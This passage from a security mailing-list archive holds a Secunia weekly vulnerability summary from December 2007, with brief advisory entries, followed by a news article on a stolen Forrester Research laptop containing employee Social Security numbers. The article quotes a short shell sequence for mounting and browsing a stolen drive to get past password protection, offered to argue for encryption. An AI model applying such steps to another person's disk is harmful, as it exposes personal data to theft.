9. [SA27883] Hitachi JP1/Cm2/Network Node Manager Unspecified Cross-Site Scripting
10. [SA27872] rPath update for idle and python

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA27963] Novell BorderManager Multiple Vulnerabilities
[SA27929] avast! Home/Professional TAR File Processing Heap Corruption
[SA27930] HTTP File Server File Upload Directory Traversal Vulnerability
[SA27923] Absolute News Manager .NET Multiple Vulnerabilities
[SA27911] Snitz Forums 2000 "BuildTime" SQL Injection Vulnerability
[SA27947] Cisco Security Agent Unspecified System Driver Buffer Overflow Vulnerability
[SA27917] SonicWALL Global VPN Client Configuration File Format String Vulnerability
[SA27901] Microsoft Web Proxy Auto-Discovery Feature Security Issue
[SA27935] Citrix EdgeSight Configuration File Information Disclosure Weakness

UNIX/Linux:
[SA27944] SUSE update for MozillaFirefox
[SA27933] Mandriva update for openssl
[SA27931] Debian update for openoffice.org and hsqldb
[SA27916] Red Hat update for openoffice.org2
[SA27914] Red Hat update for openoffice.org and hsqldb
[SA27875] FTP Admin Multiple Vulnerabilities
[SA27965] SUSE Update for Multiple Packages
[SA27950] Gentoo update for cacti
[SA27943] Debian update for wesnoth
[SA27936] Ubuntu update for perl
[SA27920] Fedora update for wesnoth
[SA27919] Fedora update for kernel
[SA27910] Squid Cache Update Denial of Service Vulnerability
[SA27896] Slackware update for rsync
[SA27891] Debian update for cacti
[SA27888] SUSE update for kernel
[SA27887] Ubuntu update for cairo
[SA27880] Cairo PNG Image Processing Integer Overflow
[SA27927] SUSE update for samba
[SA27937] Ubuntu update for mono
[SA27912] SUSE update for kernel
[SA27892] Debian update for asterisk
[SA27890] Red Hat update for htdig
[SA27882] Mandriva update for apache
[SA27879] FreeBSD sys_dev_random Random Data Replay Vulnerability
[SA27915] Xen "mov_to_rr" Security Bypass Vulnerability
[SA27913] Red Hat update for kernel
[SA27899] Zsh difflog.pl Insecure Temporary Files
[SA27897] Claws Mail sylprint.pl Insecure Temporary Files
[SA27948] Debian update for zabbix
[SA27903] Zabbix "UserParameter" Privilege Escalation Weakness
[SA27952] Gentoo update for hugin
[SA27939] OpenVMS for Integrity Servers Denial of Service Vulnerabilities
[SA27921] Avaya Products Xterm Security Bypass Security Issue
[SA27908] Linux Kernel "do_coredump()" Information Disclosure
[SA27886] Mandriva update for vixie-cron
[SA27884] Mac OS X Local Denial of Service Vulnerability
[SA27877] Solaris 10 Linux Branded Zones Denial of Service

Other:
[SA27904] F5 FirePass 4100 SSL VPN Cross-Site Scripting Vulnerabilities
[SA27898] Cisco IP Phone 7940 SIP INVITE Denial of Service Vulnerability
[SA27926] Sun SPARC Enterprise XCP Firmware Denial Of Service Vulnerabilities
[SA27945] Nokia N95 SIP Message Processing Denial of Service Weakness

Cross Platform:
[SA27928] OpenOffice Database Document Processing Unspecified Code Execution
[SA27895] tellmatic "tm_includepath" File Inclusion Vulnerabilities
[SA27878] VLC Media Player ActiveX Plugin and FLAC Vulnerabilities
[SA27876] p.mapper "_SESSION[PM_INCPHP]" File Inclusion
[SA27951] vbDrupal "taxonomy_select_nodes()" SQL Injection
[SA27949] SineCms SQL Injection and Script Insertion
[SA27932] Drupal "taxonomy_select_nodes()" SQL Injection
[SA27924] HP Select Identity Unspecified Unauthorised Access Vulnerability
[SA27909] Beehive Forum SQL Injection and Unspecified Vulnerabilities
[SA27905] Typespeed Division By Zero Denial of Service
[SA27881] Seditio "pag_sub[]" SQL Injection Vulnerability
[SA27873] Asterisk Postgres Realtime Engine SQL Injection
[SA27953] Drupal Shoutbox Module Script Insertion Vulnerabilities
[SA27941] IBM Lotus Sametime Meeting WebRunMenuFrame Page Cross-Site Scripting
[SA27925] Jetty Multiple Vulnerabilities
[SA27918] Fusion News Cross-Site Request Forgery
[SA27906] Apache HTTP Method Request Entity Too Large Cross-Site Scripting
[SA27902] CiscoWorks Common Services Cross-Site Scripting Vulnerability
[SA27900] IBM Tivoli Netcool Security Manager Unspecified Cross-Site Scripting
[SA27889] e2fsprogs libext2fs Integer Overflow Vulnerabilities
[SA27883] Hitachi JP1/Cm2/Network Node Manager Unspecified Cross-Site Scripting
[SA27874] CRM-CTT "CheckCustomerAccess()" Security Bypass
[SA27907] Firefox Charset Inheritance Cross-Site Scripting Security Issue

========================================================================
5) Vulnerabilities Content Listing

Windows:
--

[SA27963] Novell BorderManager Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, System access
Released:    2007-12-06

Some vulnerabilities have been reported in Novell BorderManager, which can be exploited by malicious people to bypass certain security restrictions or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27963/

--

[SA27929] avast! Home/Professional TAR File Processing Heap Corruption

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2007-12-05

A vulnerability has been reported in avast! Home/Professional, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27929/

--

[SA27930] HTTP File Server File Upload Directory Traversal Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2007-12-06

Luigi Auriemma has reported a vulnerability in HTTP File Server, which can be exploited by malicious users to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/27930/

--

[SA27923] Absolute News Manager .NET Multiple Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data, Exposure of system information, Exposure of sensitive information
Released:    2007-12-05

Some vulnerabilities have been reported in Absolute News Manager .NET, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks, or to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/27923/

--

[SA27911] Snitz Forums 2000 "BuildTime" SQL Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2007-12-04

Soroush Dalili has discovered a vulnerability in Snitz Forums, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/27911/

--

[SA27947] Cisco Security Agent Unspecified System Driver Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From local network
Impact:      DoS, System access
Released:    2007-12-06

A vulnerability has been reported in Cisco Security Agent for Windows, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27947/

--

[SA27917] SonicWALL Global VPN Client Configuration File Format String Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      System access
Released:    2007-12-05

A vulnerability has been discovered in SonicWALL Global VPN Client, which potentially can be exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/27917/

--

[SA27901] Microsoft Web Proxy Auto-Discovery Feature Security Issue

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass, Exposure of sensitive information
Released:    2007-12-04

A security issue has been reported in Microsoft's Web Proxy Auto-Discovery (WPAD) feature, which can be exploited by malicious people to conduct man-in-the-middle (MITM) attacks.

Full Advisory:
http://secunia.com/advisories/27901/

--

[SA27935] Citrix EdgeSight Configuration File Information Disclosure Weakness

Critical:    Not critical
Where:       Local system
Impact:      Exposure of sensitive information
Released:    2007-12-05

A weakness has been reported in Citrix EdgeSight, which can be exploited by malicious, local users to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/27935/

UNIX/Linux:
--

[SA27944] SUSE update for MozillaFirefox

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, DoS, System access
Released:    2007-12-06

SUSE has issued an update for MozillaFirefox. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site request forgery and cross-site scripting attacks or potentially compromise a user's system.

Full Advisory:
http://secunia.com/advisories/27944/

--

[SA27933] Mandriva update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-05

Mandriva has issued an update for openssl. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27933/

--

[SA27931] Debian update for openoffice.org and hsqldb

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2007-12-06

Debian has issued an update for openoffice.org and hsqldb.
This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/27931/

--

[SA27916] Red Hat update for openoffice.org2

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2007-12-06

Red Hat has issued an update for openoffice.org2. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/27916/

--

[SA27914] Red Hat update for openoffice.org and hsqldb

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2007-12-06

Red Hat has issued an update for openoffice.org and hsqldb. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/27914/

--

[SA27875] FTP Admin Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Exposure of system information, Exposure of sensitive information, System access
Released:    2007-11-30

Omni has discovered some vulnerabilities in FTP Admin, which can be exploited by malicious users to compromise a vulnerable system, and by malicious people to conduct cross-site scripting attacks and bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/27875/

--

[SA27965] SUSE Update for Multiple Packages

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Exposure of sensitive information, DoS, System access
Released:    2007-12-06

SUSE has issued an update for multiple packages. This fixes a security issue and some vulnerabilities, which can be exploited by malicious people to disclose potentially sensitive information, conduct cross-site scripting attacks, cause a DoS (Denial of Service), and potentially compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/27965/

--

[SA27950] Gentoo update for cacti

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2007-12-06

Gentoo has issued an update for cacti. This fixes a vulnerability, which potentially can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/27950/

--

[SA27943] Debian update for wesnoth

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2007-12-06

Debian has issued an update for wesnoth. This fixes a vulnerability, which can be exploited by malicious people to disclose potentially sensitive information.

Full Advisory:
http://secunia.com/advisories/27943/

--

[SA27936] Ubuntu update for perl

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-05

Ubuntu has issued an update for perl. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27936/

--

[SA27920] Fedora update for wesnoth

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of system information, DoS, System access
Released:    2007-12-04

Fedora has issued an update for wesnoth. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service), disclose potentially sensitive information, or potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27920/

--

[SA27919] Fedora update for kernel

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2007-12-04

Fedora has issued an update for the kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users and by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/27919/

-- [SA27910] Squid Cache Update Denial of Service Vulnerability
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2007-12-04
A vulnerability has been reported in Squid, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/27910/

-- [SA27896] Slackware update for rsync
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, DoS, System access
Released: 2007-12-03
Slackware has issued an update for rsync. This fixes some vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions or potentially compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/27896/

-- [SA27891] Debian update for cacti
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2007-12-03
Debian has issued an update for cacti. This fixes a vulnerability, which can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/27891/

-- [SA27888] SUSE update for kernel
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2007-12-04
SUSE has issued an update for the kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and by malicious people to cause a DoS and potentially compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/27888/

-- [SA27887] Ubuntu update for cairo
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2007-12-04
Ubuntu has issued an update for cairo. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise an application using the library.
Full Advisory: http://secunia.com/advisories/27887/

-- [SA27880] Cairo PNG Image Processing Integer Overflow
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2007-11-30
A vulnerability has been reported in Cairo, which potentially can be exploited by malicious people to compromise an application using the library.
Full Advisory: http://secunia.com/advisories/27880/

-- [SA27927] SUSE update for samba
Critical: Moderately critical
Where: From local network
Impact: System access
Released: 2007-12-06
SUSE has issued an update for samba. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/27927/

-- [SA27937] Ubuntu update for mono
Critical: Less critical
Where: From remote
Impact: System access, DoS
Released: 2007-12-05
Ubuntu has issued an update for mono. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/27937/

-- [SA27912] SUSE update for kernel
Critical: Less critical
Where: From remote
Impact: Unknown, Security Bypass, Privilege escalation, DoS, System access
Released: 2007-12-04
SUSE has issued an update for the kernel. This fixes a weakness, a security issue, and some vulnerabilities, where one has unknown impacts and others can be exploited by malicious, local users to bypass certain security restrictions, cause a DoS (Denial of Service), and gain escalated privileges, or by malicious people to cause a DoS or potentially compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/27912/

-- [SA27892] Debian update for asterisk
Critical: Less critical
Where: From remote
Impact: Manipulation of data
Released: 2007-12-03
Debian has issued an update for asterisk. This fixes a vulnerability, which can be exploited by malicious users to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/27892/

-- [SA27890] Red Hat update for htdig
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-04
Red Hat has issued an update for htdig. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/27890/

-- [SA27882] Mandriva update for apache
Critical: Less critical
Where: From remote
Impact: DoS
Released: 2007-12-04
Mandriva has issued an update for apache. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/27882/

-- [SA27879] FreeBSD sys_dev_random Random Data Replay Vulnerability
Critical: Less critical
Where: From local network
Impact: Exposure of sensitive information
Released: 2007-11-30
A vulnerability has been reported in FreeBSD, which can be exploited by malicious people to disclose potentially sensitive information.
Full Advisory: http://secunia.com/advisories/27879/

-- [SA27915] Xen "mov_to_rr" Security Bypass Vulnerability
Critical: Less critical
Where: Local system
Impact: Security Bypass
Released: 2007-12-05
A vulnerability has been reported in Xen, which can be exploited by malicious, local users to bypass certain security restrictions.
Full Advisory: http://secunia.com/advisories/27915/

-- [SA27913] Red Hat update for kernel
Critical: Less critical
Where: Local system
Impact: Security Bypass, DoS
Released: 2007-12-04
Red Hat has issued an update for the kernel. This fixes some security issues and vulnerabilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or bypass certain security restrictions.
Full Advisory: http://secunia.com/advisories/27913/

-- [SA27899] Zsh difflog.pl Insecure Temporary Files
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2007-12-03
A security issue has been reported in Zsh, which can be exploited by malicious, local users to perform certain actions with escalated privileges.
Full Advisory: http://secunia.com/advisories/27899/

-- [SA27897] Claws Mail sylprint.pl Insecure Temporary Files
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2007-12-03
A security issue has been reported in Claws Mail, which can be exploited by malicious, local users to perform certain actions with escalated privileges.
Full Advisory: http://secunia.com/advisories/27897/

-- [SA27948] Debian update for zabbix
Critical: Not critical
Where: From local network
Impact: Privilege escalation
Released: 2007-12-06
Debian has issued an update for zabbix. This fixes a weakness, which can be exploited by malicious users to perform certain actions with escalated privileges.
Full Advisory: http://secunia.com/advisories/27948/

-- [SA27903] Zabbix "UserParameter" Privilege Escalation Weakness
Critical: Not critical
Where: From local network
Impact: Privilege escalation
Released: 2007-12-03
A weakness has been reported in Zabbix, which can be exploited by malicious users to perform certain actions with escalated privileges.
Full Advisory: http://secunia.com/advisories/27903/

-- [SA27952] Gentoo update for hugin
Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2007-12-06
Gentoo has issued an update for hugin. This fixes a security issue, which can be exploited by malicious, local users to perform certain actions with escalated privileges.
Full Advisory: http://secunia.com/advisories/27952/

-- [SA27939] OpenVMS for Integrity Servers Denial of Service Vulnerabilities
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2007-12-05
Some vulnerabilities have been reported in OpenVMS for Integrity Servers, which can be exploited by malicious, local users to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/27939/

-- [SA27921] Avaya Products Xterm Security Bypass Security Issue
Critical: Not critical
Where: Local system
Impact: Security Bypass
Released: 2007-12-05
Avaya has acknowledged a security issue in various Avaya products, which potentially can be exploited by malicious, local users to bypass certain security restrictions.
Full Advisory: http://secunia.com/advisories/27921/

-- [SA27908] Linux Kernel "do_coredump()" Information Disclosure
Critical: Not critical
Where: Local system
Impact: Exposure of sensitive information
Released: 2007-12-05
A security issue has been reported in the Linux Kernel, which can be exploited by malicious, local users to disclose potentially sensitive information.
Full Advisory: http://secunia.com/advisories/27908/

-- [SA27886] Mandriva update for vixie-cron
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2007-12-04
Mandriva has issued an update for vixie-cron. This fixes a vulnerability, which can be exploited by malicious, local users to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/27886/

-- [SA27884] Mac OS X Local Denial of Service Vulnerability
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2007-12-05
A vulnerability has been discovered in Mac OS X, which can be exploited by malicious, local users to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/27884/

-- [SA27877] Solaris 10 Linux Branded Zones Denial of Service
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2007-12-03
A vulnerability has been reported in Solaris 10, which can be exploited by malicious, local users to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/27877/

Other:

-- [SA27904] F5 FirePass 4100 SSL VPN Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-03
Some vulnerabilities have been reported in F5 FirePass 4100 SSL VPN, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/27904/

-- [SA27898] Cisco IP Phone 7940 SIP INVITE Denial of Service Vulnerability
Critical: Less critical
Where: From remote
Impact: DoS
Released: 2007-12-06
The Madynes research team has reported a vulnerability in Cisco IP Phone 7940, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/27898/

-- [SA27926] Sun SPARC Enterprise XCP Firmware Denial Of Service Vulnerabilities
Critical: Less critical
Where: From local network
Impact: DoS
Released: 2007-12-05
Some vulnerabilities have been reported in the XSCF Control Package (XCP) firmware for Sun SPARC Enterprise M4000/M5000/M8000/M9000, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/27926/

-- [SA27945] Nokia N95 SIP Message Processing Denial of Service Weakness
Critical: Not critical
Where: From remote
Impact: DoS
Released: 2007-12-06
Humberto J. Abdelnur, Radu State, and Olivier Festor have reported a weakness in Nokia N95, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/27945/

Cross Platform:

-- [SA27928] OpenOffice Database Document Processing Unspecified Code Execution
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2007-12-05
A vulnerability has been reported in OpenOffice, which potentially can be exploited by malicious people to compromise a user's system.
Full Advisory: http://secunia.com/advisories/27928/

-- [SA27895] tellmatic "tm_includepath" File Inclusion Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2007-12-03
ShAy6oOoN has discovered some vulnerabilities in tellmatic, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/27895/

-- [SA27878] VLC Media Player ActiveX Plugin and FLAC Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2007-12-03
Some vulnerabilities have been reported in VLC Media Player, which potentially can be exploited by malicious people to compromise a user's system.
Full Advisory: http://secunia.com/advisories/27878/

-- [SA27876] p.mapper "_SESSION[PM_INCPHP]" File Inclusion
Critical: Highly critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information, System access
Released: 2007-12-03
ShAy6oOoN has reported a vulnerability in p.mapper, which can be exploited by malicious people to disclose sensitive information or to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/27876/

-- [SA27951] vbDrupal "taxonomy_select_nodes()" SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2007-12-06
A vulnerability has been reported in vbDrupal, which can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/27951/

-- [SA27949] SineCms SQL Injection and Script Insertion
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data, Exposure of sensitive information
Released: 2007-12-06
KiNgOfThEwOrLd has discovered some vulnerabilities in SineCms, which can be exploited by malicious people to conduct script insertion and SQL injection attacks.
Full Advisory: http://secunia.com/advisories/27949/

-- [SA27932] Drupal "taxonomy_select_nodes()" SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2007-12-06
A vulnerability has been reported in Drupal, which can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/27932/

-- [SA27924] HP Select Identity Unspecified Unauthorised Access Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2007-12-05
A vulnerability has been reported in HP Select Identity, which can be exploited by malicious people to bypass certain security restrictions.
Full Advisory: http://secunia.com/advisories/27924/

-- [SA27909] Beehive Forum SQL Injection and Unspecified Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Unknown, Manipulation of data, Exposure of sensitive information
Released: 2007-12-04
Some vulnerabilities have been reported in Beehive Forum, some with unknown impact and one which can be exploited by malicious users to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/27909/

-- [SA27905] Typespeed Division By Zero Denial of Service
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2007-12-03
A vulnerability has been reported in Typespeed, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/27905/

-- [SA27881] Seditio "pag_sub[]" SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data, Exposure of sensitive information
Released: 2007-11-30
InATeam have discovered a vulnerability in Seditio, which can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/27881/

-- [SA27873] Asterisk Postgres Realtime Engine SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2007-11-30
A vulnerability has been reported in Asterisk, which can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/27873/

-- [SA27953] Drupal Shoutbox Module Script Insertion Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-06
Some vulnerabilities have been reported in the Shoutbox module for Drupal, which can be exploited by malicious users to conduct script insertion attacks.
Full Advisory: http://secunia.com/advisories/27953/

-- [SA27941] IBM Lotus Sametime Meeting WebRunMenuFrame Page Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-06
A vulnerability has been reported in IBM Lotus Sametime, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/27941/

-- [SA27925] Jetty Multiple Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting, Hijacking
Released: 2007-12-05
Some vulnerabilities have been reported in Jetty, which can be exploited by malicious people to conduct HTTP response splitting and cross-site scripting attacks and potentially hijack a user session.
Full Advisory: http://secunia.com/advisories/27925/

-- [SA27918] Fusion News Cross-Site Request Forgery
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-06
A vulnerability has been reported in Fusion News, which can be exploited by malicious users to conduct cross-site request forgery attacks.
Full Advisory: http://secunia.com/advisories/27918/

-- [SA27906] Apache HTTP Method Request Entity Too Large Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-03
Adrian Pastor and Amir Azam have discovered a vulnerability in Apache, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/27906/

-- [SA27902] CiscoWorks Common Services Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-06
Dave Lewis has reported a vulnerability in CiscoWorks Common Services, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/27902/

-- [SA27900] IBM Tivoli Netcool Security Manager Unspecified Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-03
A vulnerability has been reported in IBM Tivoli Netcool Security Manager, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/27900/

-- [SA27889] e2fsprogs libext2fs Integer Overflow Vulnerabilities
Critical: Less critical
Where: From remote
Impact: DoS, System access
Released: 2007-12-06
Some vulnerabilities have been reported in the libext2fs library of e2fsprogs, which potentially can be exploited by malicious people to compromise an application using the library.
Full Advisory: http://secunia.com/advisories/27889/

-- [SA27883] Hitachi JP1/Cm2/Network Node Manager Unspecified Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-11-30
A vulnerability has been reported in Hitachi JP1/Cm2/Network Node Manager, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/27883/

-- [SA27874] CRM-CTT "CheckCustomerAccess()" Security Bypass
Critical: Less critical
Where: From remote
Impact: Security Bypass
Released: 2007-12-03
A security issue has been reported in CRM-CTT, which can be exploited by malicious users to bypass certain security restrictions.
Full Advisory: http://secunia.com/advisories/27874/

-- [SA27907] Firefox Charset Inheritance Cross-Site Scripting Security Issue
Critical: Not critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-04
Paul Szabo has discovered a security issue in Firefox, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/27907/

========================================================================

Secunia recommends that you verify all advisories you receive, by clicking the link.

Secunia NEVER sends attached files with advisories.

Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe: http://secunia.com/secunia_weekly_summary/

Contact details:
Web : http://secunia.com/
E-mail : support@secunia.com
Tel : +45 70 20 51 44
Fax : +45 70 20 51 45

From alerts at infosecnews.org Fri Dec 7 01:13:40 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Forrester Loses Laptop Containing Personnel Data
Message-ID:

http://www.eweek.com/article2/0,1895,2228887,00.asp

By Lisa Vaas
eWEEK.com
December 5, 2007

The incident appears to be a clear case of, "Do as I say, not as I do."

Thieves stole a laptop from the home of a Forrester Research employee during the week of Nov. 26, potentially exposing the names, addresses and Social Security numbers of an undisclosed number of current and former employees and directors, the company said in a letter mailed to those affected on Dec. 3.

Forrester "Chief People Officer" Elizabeth Lemons said in the letter that the hard drive is password-protected but made no mention of encryption.

The laptop contained records pertaining to those who have received grants of Forrester stock options or who have participated in the research firm's Employee Stock Purchase Plan, according to the letter. Those who have done contractual work for the consultancy, but who haven't participated in either stock plan, also appear to be affected.

Besides the irony of a technology consultancy that apparently does not encrypt sensitive data on employee laptops, the office of Forrester's "chief people officer" apparently had not informed the firm's media staff of the incident before sending out the letter. When eWEEK contacted Forrester's press hotline on Dec. 5, a staffer said that this was the first she had heard of the incident. As such, the media relations staff was not prepared with an incident response plan.
In these days of multiple weekly high-profile data breaches in the news, consultants routinely warn firms of the importance of encrypting portable data devices such as memory sticks, PDAs and laptops. They also encourage organizations to lay out incident response plans that detail a chain of command to ensure that the right executive is informed, that public relations staff are devoted to incident response and that the proper authorities have been notified, among other things.

The idea that password protection actually protects laptop data is one that's laughed out of the room by security professionals.

"Anybody with a relative clue, or at least a copy of Knoppix or F.I.R.E. [data recovery tools], could potentially bypass security measures implemented on lost or stolen drives. Period," wrote data breach experts at Attrition.org, a volunteer-run site that keeps a running list of data breaches relied on by organizations including Privacy Rights Clearinghouse.

"Unless data on a drive is encrypted with a key either unknown or inaccessible to an intruder, that data is open to compromise," Attrition said in a February posting that followed the recovery of a lost VA laptop. "We won't even go into cracking AES256 or 3DES here; for the most part, such measures are impractical. Cracking algorithms over 128-bit is possible, but only with a lot of time and/or firepower. However, shoving a CD in the machine, rebooting and typing: '# mount /dev/hda1 /tmp/stolen_info/ # cd /tmp/stolen_info/ # ls -la' is not that difficult and it makes all of that 'password-protected' data quite readable, even for a casual computer user.

"If the person who stole the laptop were to remove the drive and perform a bit-by-bit copy, they would circumvent any password protection on the computer. Remember, BIOS and Operating System passwords rely on the computer and OS to boot up. If you remove the drive, neither will offer any level of protection and are completely worthless."
A volunteer for Attrition who goes by the online name "Lyger" told eWEEK that Forrester's notification letter to those affected "should be of little comfort," given that Forrester didn't divulge whether the laptop's hard drive was encrypted.

At any rate, it may be ironic, but Forrester's dilemma is far from unique. A former analyst for a defunct technology consultancy wasn't surprised to learn the details behind the breach.

